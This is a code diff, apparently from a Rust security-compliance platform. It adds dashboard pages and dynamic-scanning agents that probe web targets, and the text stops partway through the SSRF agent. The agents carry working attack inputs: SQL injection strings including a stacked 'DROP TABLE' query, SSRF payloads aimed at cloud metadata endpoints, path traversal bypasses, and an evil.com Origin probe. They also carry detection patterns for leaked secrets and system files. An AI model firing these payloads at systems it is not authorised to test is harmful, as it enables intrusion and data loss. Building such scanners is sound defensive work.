th { "Type" }
th { "Rate Limit" }
th { "Destructive" }
th { "Actions" }
}
}
tbody {
for target in target_list {
{
let target_id = target.get("_id").and_then(|v| v.get("$oid")).and_then(|v| v.as_str()).unwrap_or("").to_string();
rsx! {
tr {
td { "{target.get(\"name\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td { code { "{target.get(\"base_url\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" } }
td { "{target.get(\"target_type\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td { "{target.get(\"rate_limit\").and_then(|v| v.as_u64()).unwrap_or(0)} req/s" }
td {
if target.get("allow_destructive").and_then(|v| v.as_bool()).unwrap_or(false) {
span { class: "badge badge-danger", "Yes" }
} else {
span { class: "badge badge-success", "No" }
}
}
td {
button {
class: "btn btn-sm",
onclick: {
let tid = target_id.clone();
move |_| {
let tid = tid.clone();
spawn(async move {
match trigger_dast_scan(tid).await {
Ok(_) => toasts.push(ToastType::Success, "DAST scan triggered"),
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
}
},
"Scan"
}
}
}
}
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load targets." } },
None => rsx! { p { "Loading..." } },
}
}
}
}


@@ -0,0 +1,105 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::toast::{ToastType, Toasts};
use crate::infrastructure::graph::{fetch_graph, trigger_graph_build};
#[component]
pub fn GraphExplorerPage(repo_id: String) -> Element {
let repo_id_clone = repo_id.clone();
let mut graph_data = use_resource(move || {
let rid = repo_id_clone.clone();
async move {
if rid.is_empty() {
return None;
}
fetch_graph(rid).await.ok()
}
});
let mut building = use_signal(|| false);
let mut toasts = use_context::<Toasts>();
rsx! {
PageHeader {
title: "Code Knowledge Graph",
description: "Interactive visualization of code structure and relationships",
}
if repo_id.is_empty() {
div { class: "card",
p { "Select a repository to view its code graph." }
p { "You can trigger a graph build from the Repositories page." }
}
} else {
div { style: "margin-bottom: 16px;",
button {
class: "btn btn-primary",
disabled: building(),
onclick: {
let rid = repo_id.clone();
move |_| {
let rid = rid.clone();
building.set(true);
spawn(async move {
match trigger_graph_build(rid).await {
Ok(_) => toasts.push(ToastType::Success, "Graph build triggered"),
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
building.set(false);
graph_data.restart();
});
}
},
if building() { "Building..." } else { "Build Graph" }
}
}
div { class: "card",
h3 { "Graph Explorer \u{2014} {repo_id}" }
match &*graph_data.read() {
Some(Some(data)) => {
let build = data.data.build.clone().unwrap_or_default();
let node_count = build.get("node_count").and_then(|n| n.as_u64()).unwrap_or(0);
let edge_count = build.get("edge_count").and_then(|n| n.as_u64()).unwrap_or(0);
let community_count = build.get("community_count").and_then(|n| n.as_u64()).unwrap_or(0);
rsx! {
div { class: "grid grid-cols-3 gap-4 mb-4",
div { class: "stat-card",
div { class: "stat-value", "{node_count}" }
div { class: "stat-label", "Nodes" }
}
div { class: "stat-card",
div { class: "stat-value", "{edge_count}" }
div { class: "stat-label", "Edges" }
}
div { class: "stat-card",
div { class: "stat-value", "{community_count}" }
div { class: "stat-label", "Communities" }
}
}
div {
id: "graph-container",
style: "width: 100%; height: 600px; border: 1px solid var(--border); border-radius: 8px; background: var(--bg-secondary);",
}
script {
r#"
console.log('Graph explorer loaded');
"#
}
}
},
Some(None) => rsx! {
p { "No graph data available. Build the graph first." }
},
None => rsx! {
p { "Loading graph data..." }
},
}
}
}
}
}


@@ -0,0 +1,53 @@
use dioxus::prelude::*;
use crate::app::Route;
use crate::components::page_header::PageHeader;
use crate::infrastructure::repositories::fetch_repositories;
#[component]
pub fn GraphIndexPage() -> Element {
let repos = use_resource(|| async { fetch_repositories(1).await.ok() });
rsx! {
PageHeader {
title: "Code Knowledge Graph",
description: "Select a repository to explore its code graph",
}
div { class: "card",
h3 { "Repositories" }
match &*repos.read() {
Some(Some(data)) => {
let repo_list = &data.data;
if repo_list.is_empty() {
rsx! { p { "No repositories found. Add a repository first." } }
} else {
rsx! {
div { class: "grid grid-cols-1 gap-3",
for repo in repo_list {
{
let repo_id = repo.id.map(|id| id.to_hex()).unwrap_or_default();
let name = repo.name.clone();
let url = repo.git_url.clone();
rsx! {
Link {
to: Route::GraphExplorerPage { repo_id: repo_id },
class: "card hover:bg-gray-800 transition-colors cursor-pointer",
h4 { "{name}" }
if !url.is_empty() {
p { class: "text-sm text-muted", "{url}" }
}
}
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load repositories." } },
None => rsx! { p { "Loading repositories..." } },
}
}
}
}


@@ -0,0 +1,97 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::infrastructure::graph::fetch_impact;
#[component]
pub fn ImpactAnalysisPage(repo_id: String, finding_id: String) -> Element {
let impact_data = use_resource(move || {
let rid = repo_id.clone();
let fid = finding_id.clone();
async move { fetch_impact(rid, fid).await.ok() }
});
rsx! {
PageHeader {
title: "Impact Analysis",
description: "Blast radius and affected entry points for a security finding",
}
div { class: "card",
match &*impact_data.read() {
Some(Some(resp)) => {
let impact = resp.data.clone().unwrap_or_default();
rsx! {
div { class: "grid grid-cols-2 gap-4 mb-4",
div { class: "stat-card",
div { class: "stat-value",
"{impact.get(\"blast_radius\").and_then(|v| v.as_u64()).unwrap_or(0)}"
}
div { class: "stat-label", "Blast Radius (nodes affected)" }
}
div { class: "stat-card",
div { class: "stat-value",
"{impact.get(\"affected_entry_points\").and_then(|v| v.as_array()).map(|a| a.len()).unwrap_or(0)}"
}
div { class: "stat-label", "Entry Points Affected" }
}
}
h3 { "Affected Entry Points" }
if let Some(entries) = impact.get("affected_entry_points").and_then(|v| v.as_array()) {
if entries.is_empty() {
p { class: "text-muted", "No entry points affected." }
} else {
ul { class: "list",
for entry in entries {
li { "{entry.as_str().unwrap_or(\"-\")}" }
}
}
}
}
h3 { class: "mt-4", "Call Chains" }
if let Some(chains) = impact.get("call_chains").and_then(|v| v.as_array()) {
if chains.is_empty() {
p { class: "text-muted", "No call chains found." }
} else {
for (i, chain) in chains.iter().enumerate() {
div { class: "card mb-2",
strong { "Chain {i + 1}: " }
if let Some(steps) = chain.as_array() {
for (j, step) in steps.iter().enumerate() {
span { "{step.as_str().unwrap_or(\"-\")}" }
if j < steps.len() - 1 {
span { class: "text-muted", " → " }
}
}
}
}
}
}
}
h3 { class: "mt-4", "Direct Callers" }
if let Some(callers) = impact.get("direct_callers").and_then(|v| v.as_array()) {
if callers.is_empty() {
p { class: "text-muted", "No direct callers." }
} else {
ul { class: "list",
for caller in callers {
li { code { "{caller.as_str().unwrap_or(\"-\")}" } }
}
}
}
}
}
},
Some(None) => rsx! {
p { "No impact analysis data available for this finding." }
},
None => rsx! {
p { "Loading impact analysis..." }
},
}
}
}
}


@@ -1,13 +1,27 @@
pub mod dast_finding_detail;
pub mod dast_findings;
pub mod dast_overview;
pub mod dast_targets;
pub mod finding_detail;
pub mod findings;
pub mod graph_explorer;
pub mod graph_index;
pub mod impact_analysis;
pub mod issues;
pub mod overview;
pub mod repositories;
pub mod sbom;
pub mod settings;
pub use dast_finding_detail::DastFindingDetailPage;
pub use dast_findings::DastFindingsPage;
pub use dast_overview::DastOverviewPage;
pub use dast_targets::DastTargetsPage;
pub use finding_detail::FindingDetailPage;
pub use findings::FindingsPage;
pub use graph_explorer::GraphExplorerPage;
pub use graph_index::GraphIndexPage;
pub use impact_analysis::ImpactAnalysisPage;
pub use issues::IssuesPage;
pub use overview::OverviewPage;
pub use repositories::RepositoriesPage;


@@ -2,6 +2,7 @@ use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::pagination::Pagination;
use crate::components::toast::{ToastType, Toasts};
#[component]
pub fn RepositoriesPage() -> Element {
@@ -10,8 +11,9 @@ pub fn RepositoriesPage() -> Element {
let mut name = use_signal(String::new);
let mut git_url = use_signal(String::new);
let mut branch = use_signal(|| "main".to_string());
let mut toasts = use_context::<Toasts>();
let mut repos = use_resource(move || {
let p = page();
async move {
crate::infrastructure::repositories::fetch_repositories(p)
@@ -71,7 +73,13 @@ pub fn RepositoriesPage() -> Element {
let u = git_url();
let b = branch();
spawn(async move {
match crate::infrastructure::repositories::add_repository(n, u, b).await {
Ok(_) => {
toasts.push(ToastType::Success, "Repository added");
repos.restart();
}
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
show_add_form.set(false);
name.set(String::new());
@@ -125,7 +133,10 @@ pub fn RepositoriesPage() -> Element {
onclick: move |_| {
let id = repo_id_clone.clone();
spawn(async move {
match crate::infrastructure::repositories::trigger_repo_scan(id).await {
Ok(_) => toasts.push(ToastType::Success, "Scan triggered"),
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
},
"Scan"


@@ -0,0 +1,32 @@
[package]
name = "compliance-dast"
version = "0.1.0"
edition = "2021"
[lints]
workspace = true
[dependencies]
compliance-core = { workspace = true }
serde = { workspace = true }
serde_json = { workspace = true }
chrono = { workspace = true }
thiserror = { workspace = true }
tracing = { workspace = true }
uuid = { workspace = true }
tokio = { workspace = true }
mongodb = { workspace = true }
reqwest = { workspace = true }
# HTML parsing
scraper = "0.22"
# Browser automation
chromiumoxide = { version = "0.7", features = ["tokio-runtime"], default-features = false }
# Docker sandboxing
bollard = "0.18"
# Serialization
bson = "2"
url = "2"


@@ -0,0 +1,307 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// API fuzzing agent that tests for misconfigurations and information disclosure
pub struct ApiFuzzerAgent {
http: reqwest::Client,
}
impl ApiFuzzerAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
/// Common API paths to probe
fn discovery_paths(&self) -> Vec<(&str, &str)> {
vec![
("/.env", "Environment file exposure"),
("/.git/config", "Git config exposure"),
("/api/swagger.json", "Swagger spec exposure"),
("/api/openapi.json", "OpenAPI spec exposure"),
("/api-docs", "API documentation exposure"),
("/graphql", "GraphQL endpoint"),
("/debug", "Debug endpoint"),
("/actuator/health", "Spring actuator"),
("/wp-config.php.bak", "WordPress config backup"),
("/.well-known/openid-configuration", "OIDC config"),
("/server-status", "Apache server status"),
("/phpinfo.php", "PHP info exposure"),
("/robots.txt", "Robots.txt"),
("/sitemap.xml", "Sitemap"),
("/.htaccess", "htaccess exposure"),
("/backup.sql", "SQL backup exposure"),
("/api/v1/users", "User enumeration endpoint"),
]
}
/// Patterns indicating sensitive information disclosure
fn sensitive_patterns(&self) -> Vec<&str> {
vec![
"password",
"api_key",
"apikey",
"secret",
"token",
"private_key",
"aws_access_key",
"jdbc:",
"mongodb://",
"redis://",
"postgresql://",
]
}
}
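The discovery loop in `run` below triages each accessible path with a three-way rule: secret-looking strings in the body escalate to Critical, sensitive file paths to High, anything else Medium. A dependency-free sketch of that rule (hypothetical `classify_severity` helper, pattern list abbreviated):

```rust
// Sketch of the severity triage applied by the discovery loop:
// secrets in body => Critical, sensitive path => High, else Medium.
// `classify_severity` is a hypothetical helper mirroring the inline logic.
#[derive(Debug, PartialEq)]
enum Triage {
    Critical,
    High,
    Medium,
}

fn classify_severity(path: &str, body: &str) -> Triage {
    // Abbreviated subset of sensitive_patterns()
    let patterns = ["password", "api_key", "secret", "token", "mongodb://"];
    let body_lower = body.to_lowercase();
    if patterns.iter().any(|p| body_lower.contains(p)) {
        Triage::Critical
    } else if path.contains(".env") || path.contains(".git") || path.contains("backup") {
        Triage::High
    } else {
        Triage::Medium
    }
}
```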
impl DastAgent for ApiFuzzerAgent {
fn name(&self) -> &str {
"api_fuzzer"
}
async fn run(
&self,
target: &DastTarget,
_context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
let base = target.base_url.trim_end_matches('/');
// Phase 1: Path discovery
for (path, description) in self.discovery_paths() {
let url = format!("{base}{path}");
let response = match self.http.get(&url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
if status == 200 {
let body = response.text().await.unwrap_or_default();
// Check if it's actually sensitive content (not just a 200 catch-all)
let is_sensitive = !body.is_empty()
&& body.len() > 10
&& !body.contains("404")
&& !body.contains("not found");
if is_sensitive {
let snippet = body.chars().take(500).collect::<String>();
// Check for information disclosure
let body_lower = body.to_lowercase();
let has_secrets = self
.sensitive_patterns()
.iter()
.any(|p| body_lower.contains(p));
let severity = if has_secrets {
Severity::Critical
} else if path.contains(".env")
|| path.contains(".git")
|| path.contains("backup")
{
Severity::High
} else {
Severity::Medium
};
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let vuln_type = if has_secrets {
DastVulnType::InformationDisclosure
} else {
DastVulnType::SecurityMisconfiguration
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
vuln_type,
format!("{description}: {path}"),
format!(
"Sensitive resource accessible at {url}. {}",
if has_secrets {
"Response contains potentially sensitive information."
} else {
"This resource should not be publicly accessible."
}
),
severity,
url,
"GET".to_string(),
);
finding.exploitable = has_secrets;
finding.evidence = vec![evidence];
finding.cwe = Some(if has_secrets {
"CWE-200".to_string()
} else {
"CWE-16".to_string()
});
findings.push(finding);
}
}
}
// Phase 2: CORS misconfiguration check
let cors_finding = self.check_cors(base, &target_id).await;
if let Some(f) = cors_finding {
findings.push(f);
}
// Phase 3: Check for verbose error responses
let error_url = format!("{base}/nonexistent-path-{}", uuid::Uuid::new_v4());
if let Ok(response) = self.http.get(&error_url).send().await {
let status = response.status().as_u16();
let body = response.text().await.unwrap_or_default();
let body_lower = body.to_lowercase();
let has_stack_trace = body_lower.contains("traceback")
|| body_lower.contains("stack trace")
|| body_lower.contains("at line")
|| body_lower.contains("exception in")
|| body_lower.contains("error in")
|| (body_lower.contains(".py") && body_lower.contains("line"));
if has_stack_trace {
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: error_url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::InformationDisclosure,
"Verbose error messages expose stack traces".to_string(),
"The application exposes detailed error information including stack traces. \
This can reveal internal paths, framework versions, and code structure."
.to_string(),
Severity::Low,
error_url,
"GET".to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-209".to_string());
finding.remediation = Some(
"Configure the application to use generic error pages in production. \
Do not expose stack traces or internal error details to end users."
.to_string(),
);
findings.push(finding);
}
}
info!(findings = findings.len(), "API fuzzing scan complete");
Ok(findings)
}
}
impl ApiFuzzerAgent {
async fn check_cors(&self, base_url: &str, target_id: &str) -> Option<DastFinding> {
let response = self
.http
.get(base_url)
.header("Origin", "https://evil.com")
.send()
.await
.ok()?;
let headers = response.headers();
let acao = headers
.get("access-control-allow-origin")?
.to_str()
.ok()?;
if acao == "*" || acao == "https://evil.com" {
let acac = headers
.get("access-control-allow-credentials")
.and_then(|v| v.to_str().ok())
.unwrap_or("false");
// A permissive origin combined with credentials is the worst case
let severity = if acac == "true" {
Severity::High
} else if acao == "*" {
Severity::Medium
} else {
Severity::Low
};
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: base_url.to_string(),
request_headers: Some(
[("Origin".to_string(), "https://evil.com".to_string())]
.into_iter()
.collect(),
),
request_body: None,
response_status: response.status().as_u16(),
response_headers: Some(
[(
"Access-Control-Allow-Origin".to_string(),
acao.to_string(),
)]
.into_iter()
.collect(),
),
response_snippet: None,
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.to_string(),
DastVulnType::SecurityMisconfiguration,
"CORS misconfiguration allows arbitrary origins".to_string(),
format!(
"The server responds with Access-Control-Allow-Origin: {acao} \
which may allow cross-origin attacks."
),
severity,
base_url.to_string(),
"GET".to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-942".to_string());
finding.remediation = Some(
"Configure CORS to only allow trusted origins. \
Never use wildcard (*) with credentials."
.to_string(),
);
Some(finding)
} else {
None
}
}
}
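The severity ladder in `check_cors` can be distilled into a pure function for reference. This is an illustrative sketch: the `Sev` enum and `cors_severity` name stand in for the crate's `Severity` type and the inline logic above.

```rust
#[derive(Debug, PartialEq)]
enum Sev {
    Low,
    Medium,
    High,
}

/// Mirrors the classification in `check_cors`: a permissive origin
/// combined with credentials is treated as the worst case.
fn cors_severity(acao: &str, acac: &str) -> Sev {
    if acac == "true" {
        Sev::High
    } else if acao == "*" {
        Sev::Medium
    } else {
        Sev::Low
    }
}

fn main() {
    assert_eq!(cors_severity("https://evil.com", "true"), Sev::High);
    assert_eq!(cors_severity("*", "false"), Sev::Medium);
    assert_eq!(cors_severity("https://evil.com", "false"), Sev::Low);
    println!("ok");
}
```

Factoring the ladder out like this makes the policy unit-testable without a live HTTP target.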


@@ -0,0 +1,219 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// Authentication bypass testing agent
pub struct AuthBypassAgent {
http: reqwest::Client,
}
impl AuthBypassAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
}
impl DastAgent for AuthBypassAgent {
fn name(&self) -> &str {
"auth_bypass"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
// Test 1: Access protected endpoints without authentication
for endpoint in &context.endpoints {
if !endpoint.requires_auth {
continue;
}
// Try accessing without auth
let response = match self.http.get(&endpoint.url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
// If we get 200 on a supposedly auth-required endpoint
if status == 200 {
let body = response.text().await.unwrap_or_default();
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: endpoint.url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::AuthBypass,
format!("Authentication bypass on {}", endpoint.url),
format!(
"Protected endpoint {} returned HTTP 200 without authentication credentials.",
endpoint.url
),
Severity::Critical,
endpoint.url.clone(),
"GET".to_string(),
);
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-287".to_string());
finding.remediation = Some(
"Ensure all protected endpoints validate authentication tokens. \
Implement server-side authentication checks that cannot be bypassed."
.to_string(),
);
findings.push(finding);
}
}
// Test 2: HTTP method tampering
let methods = ["PUT", "PATCH", "DELETE", "OPTIONS"];
for endpoint in &context.endpoints {
if endpoint.method != "GET" && endpoint.method != "POST" {
continue;
}
for method in &methods {
let response = match self
.http
.request(
reqwest::Method::from_bytes(method.as_bytes())
.unwrap_or(reqwest::Method::GET),
&endpoint.url,
)
.send()
.await
{
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
// If a non-standard method returns 200 when it shouldn't
if status == 200 && *method == "DELETE" && !target.allow_destructive {
let evidence = DastEvidence {
request_method: method.to_string(),
request_url: endpoint.url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: None,
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::AuthBypass,
format!("HTTP method tampering: {} accepted on {}", method, endpoint.url),
format!(
"Endpoint {} accepts {} requests which may bypass access controls.",
endpoint.url, method
),
Severity::Medium,
endpoint.url.clone(),
method.to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-288".to_string());
findings.push(finding);
}
}
}
// Test 3: Path traversal for auth bypass
let traversal_paths = [
"/../admin",
"/..;/admin",
"/%2e%2e/admin",
"/admin%00",
"/ADMIN",
"/Admin",
];
for path in &traversal_paths {
let test_url = format!("{}{}", target.base_url.trim_end_matches('/'), path);
let response = match self.http.get(&test_url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
if status == 200 {
let body = response.text().await.unwrap_or_default();
// Check if response looks like an admin page
let body_lower = body.to_lowercase();
if body_lower.contains("admin")
|| body_lower.contains("dashboard")
|| body_lower.contains("management")
{
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: test_url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: Some(path.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::AuthBypass,
format!("Path traversal auth bypass: {path}"),
format!(
"Possible authentication bypass via path traversal. \
Accessing '{}' returned admin-like content.",
test_url
),
Severity::High,
test_url,
"GET".to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-22".to_string());
findings.push(finding);
break;
}
}
}
info!(findings = findings.len(), "Auth bypass scan complete");
Ok(findings)
}
}
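The case-variant probes above (`/ADMIN`, `/Admin`) generalize to any path segment; a minimal sketch of generating them, assuming a hypothetical `case_probes` helper not present in the agent:

```rust
/// Generate simple case-mutation probes for a path segment, as used
/// to catch routers that match paths case-insensitively.
fn case_probes(segment: &str) -> Vec<String> {
    let lower = segment.to_lowercase();
    let upper = segment.to_uppercase();
    // Title-case: uppercase the first character only.
    let mut chars = lower.chars();
    let title = match chars.next() {
        Some(c) => c.to_uppercase().collect::<String>() + chars.as_str(),
        None => String::new(),
    };
    [lower, upper, title]
        .into_iter()
        .map(|s| format!("/{s}"))
        .collect()
}

fn main() {
    let probes = case_probes("admin");
    assert_eq!(probes, vec!["/admin", "/ADMIN", "/Admin"]);
    println!("ok");
}
```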


@@ -0,0 +1,195 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::{info, warn};
/// SQL Injection testing agent
pub struct SqlInjectionAgent {
http: reqwest::Client,
}
impl SqlInjectionAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
/// Test payloads for SQL injection detection
fn payloads(&self) -> Vec<(&str, &str)> {
vec![
("' OR '1'='1", "boolean-based blind"),
("1' AND SLEEP(2)-- -", "time-based blind"),
("' UNION SELECT NULL--", "union-based"),
("1; DROP TABLE test--", "stacked queries"),
("' OR 1=1#", "mysql boolean"),
("1' ORDER BY 1--", "order by probe"),
("') OR ('1'='1", "parenthesis bypass"),
]
}
/// Error patterns that indicate SQL injection
fn error_patterns(&self) -> Vec<&str> {
vec![
"sql syntax",
"mysql_fetch",
"ora-01756",
"sqlite3::query",
"pg_query",
"unclosed quotation mark",
"quoted string not properly terminated",
"you have an error in your sql",
"warning: mysql",
"microsoft sql native client error",
"postgresql query failed",
"unterminated string",
"syntax error at or near",
]
}
}
impl DastAgent for SqlInjectionAgent {
fn name(&self) -> &str {
"sql_injection"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
for endpoint in &context.endpoints {
// Only test endpoints with parameters
if endpoint.parameters.is_empty() {
continue;
}
for param in &endpoint.parameters {
for (payload, technique) in self.payloads() {
// Build the request with the injection payload
let test_url = if endpoint.method == "GET" {
format!(
"{}?{}={}",
endpoint.url,
param.name,
urlencoding::encode(payload)
)
} else {
endpoint.url.clone()
};
let request = if endpoint.method == "POST" {
self.http
.post(&endpoint.url)
.form(&[(param.name.as_str(), payload)])
} else {
self.http.get(&test_url)
};
let response = match request.send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
let headers: std::collections::HashMap<String, String> = response
.headers()
.iter()
.map(|(k, v)| (k.to_string(), v.to_str().unwrap_or("").to_string()))
.collect();
let body = response.text().await.unwrap_or_default();
// Check for SQL error patterns in response
let body_lower = body.to_lowercase();
let is_vulnerable = self
.error_patterns()
.iter()
.any(|pattern| body_lower.contains(pattern));
if is_vulnerable {
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: endpoint.method.clone(),
request_url: test_url.clone(),
request_headers: None,
request_body: if endpoint.method == "POST" {
Some(format!("{}={}", param.name, payload))
} else {
None
},
response_status: status,
response_headers: Some(headers),
response_snippet: Some(snippet),
screenshot_path: None,
payload: Some(payload.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(), // scan_run_id set by orchestrator
target_id.clone(),
DastVulnType::SqlInjection,
format!("SQL Injection ({technique}) in parameter '{}'", param.name),
format!(
"SQL injection vulnerability detected in parameter '{}' at {} using {} technique. \
The server returned SQL error messages in response to the injected payload.",
param.name, endpoint.url, technique
),
Severity::Critical,
endpoint.url.clone(),
endpoint.method.clone(),
);
finding.parameter = Some(param.name.clone());
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-89".to_string());
finding.remediation = Some(
"Use parameterized queries or prepared statements. \
Never concatenate user input into SQL queries."
.to_string(),
);
findings.push(finding);
warn!(
endpoint = %endpoint.url,
param = %param.name,
technique,
"SQL injection found"
);
// Don't test more payloads for same param once confirmed
break;
}
}
}
}
info!(findings = findings.len(), "SQL injection scan complete");
Ok(findings)
}
}
/// URL-encode a string for query parameters
mod urlencoding {
pub fn encode(input: &str) -> String {
let mut encoded = String::new();
for byte in input.bytes() {
match byte {
b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'-' | b'_' | b'.' | b'~' => {
encoded.push(byte as char);
}
_ => {
encoded.push_str(&format!("%{:02X}", byte));
}
}
}
encoded
}
}
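The local `urlencoding::encode` helper percent-encodes every byte outside the RFC 3986 unreserved set. A quick standalone check of its behavior on a typical injection payload (the function body is copied from the module above):

```rust
/// Percent-encode everything except RFC 3986 unreserved characters.
fn encode(input: &str) -> String {
    let mut encoded = String::new();
    for byte in input.bytes() {
        match byte {
            b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'-' | b'_' | b'.' | b'~' => {
                encoded.push(byte as char);
            }
            _ => encoded.push_str(&format!("%{byte:02X}")),
        }
    }
    encoded
}

fn main() {
    // Spaces, quotes, and '=' are escaped; unreserved characters pass through.
    assert_eq!(encode("' OR '1'='1"), "%27%20OR%20%271%27%3D%271");
    assert_eq!(encode("abc-123_.~"), "abc-123_.~");
    println!("ok");
}
```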


@@ -0,0 +1,5 @@
pub mod api_fuzzer;
pub mod auth_bypass;
pub mod injection;
pub mod ssrf;
pub mod xss;

View File

@@ -0,0 +1,169 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// Server-Side Request Forgery (SSRF) testing agent
pub struct SsrfAgent {
http: reqwest::Client,
}
impl SsrfAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
fn payloads(&self) -> Vec<(&str, &str)> {
vec![
("http://127.0.0.1", "localhost IPv4"),
("http://[::1]", "localhost IPv6"),
("http://0.0.0.0", "zero address"),
("http://169.254.169.254/latest/meta-data/", "AWS metadata"),
(
"http://metadata.google.internal/",
"GCP metadata",
),
("http://127.0.0.1:22", "SSH port probe"),
("http://127.0.0.1:3306", "MySQL port probe"),
("http://localhost/admin", "localhost admin"),
]
}
fn internal_indicators(&self) -> Vec<&str> {
vec![
"ami-id",
"instance-id",
"local-hostname",
"public-hostname",
"iam/security-credentials",
"computeMetadata",
"OpenSSH",
"mysql_native_password",
"root:x:0:",
]
}
}
impl DastAgent for SsrfAgent {
fn name(&self) -> &str {
"ssrf"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
// Find endpoints with URL-like parameters
for endpoint in &context.endpoints {
let url_params: Vec<_> = endpoint
.parameters
.iter()
.filter(|p| {
let name_lower = p.name.to_lowercase();
name_lower.contains("url")
|| name_lower.contains("uri")
|| name_lower.contains("link")
|| name_lower.contains("src")
|| name_lower.contains("redirect")
|| name_lower.contains("callback")
|| name_lower.contains("fetch")
|| name_lower.contains("load")
})
.collect();
if url_params.is_empty() {
continue;
}
for param in &url_params {
for (payload, technique) in self.payloads() {
let request = if endpoint.method == "POST" {
self.http
.post(&endpoint.url)
.form(&[(param.name.as_str(), payload)])
} else {
let test_url = format!(
"{}?{}={}",
endpoint.url, param.name, payload
);
self.http.get(&test_url)
};
let response = match request.send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
let body = response.text().await.unwrap_or_default();
// Check for SSRF indicators
let body_lower = body.to_lowercase();
let is_vulnerable = self
.internal_indicators()
.iter()
.any(|indicator| body_lower.contains(&indicator.to_lowercase()));
if is_vulnerable {
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: endpoint.method.clone(),
request_url: endpoint.url.clone(),
request_headers: None,
request_body: Some(format!("{}={}", param.name, payload)),
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
